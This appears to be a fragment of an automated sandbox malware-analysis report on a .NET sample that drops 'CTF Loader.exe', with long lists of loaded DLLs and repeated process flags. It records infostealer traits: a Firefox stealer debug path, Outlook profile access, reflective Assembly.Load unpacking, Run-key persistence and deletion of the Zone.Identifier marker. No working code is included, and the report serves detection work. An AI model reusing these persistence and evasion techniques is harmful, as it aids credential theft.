Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: avrt.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: audioses.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: midimap.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: ksuser.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: avrt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: audioses.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: midimap.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Section loaded: fwpuclnt.dll

Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: ZOYGRL1ePa.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: ZOYGRL1ePa.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: r\VB.net\stealers\firefoxx64\firefox_f4\obj\Debug\firefox_f4.pdb source: ZOYGRL1ePa.exe, CTF Loader.exe.0.dr
Source:	Binary string: C:\Users\Admin\Desktop\IELibrary\IELibrary\obj\Debug\IELibrary.pdb source: ZOYGRL1ePa.exe, CTF Loader.exe.0.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: ZOYGRL1ePa.exe, FD.cs	.Net Code: NAW System.Reflection.Assembly.Load(byte[])
Source: CTF Loader.exe.0.dr, FD.cs	.Net Code: NAW System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Code function: 0_2_06FC97F1 push es; ret	0_2_06FC97E0
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Code function: 0_2_06FC97D0 push es; ret	0_2_06FC97E0
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Code function: 0_2_06FC1F20 push es; ret	0_2_06FC1F30
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 4_2_00777A2A push 7C0698DEh; retf	4_2_00777A35
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 4_2_05FC81A3 push eax; retf	4_2_05FC81A9
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Code function: 4_2_05FC8819 push 8BFFFFFFh; retf	4_2_05FC8828

Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe

File created: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe

Jump to dropped file

Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MyOtApp			Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MyOtApp			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	File opened: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	File opened: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe:Zone.Identifier read attributes \| delete			Jump to behavior

Moves itself to temp directory

Source: c:\users\user\desktop\zoygrl1epa.exe

File moved: C:\Users\user\AppData\Local\Temp\tmpG359.tmp

Jump to behavior

Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ZOYGRL1ePa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
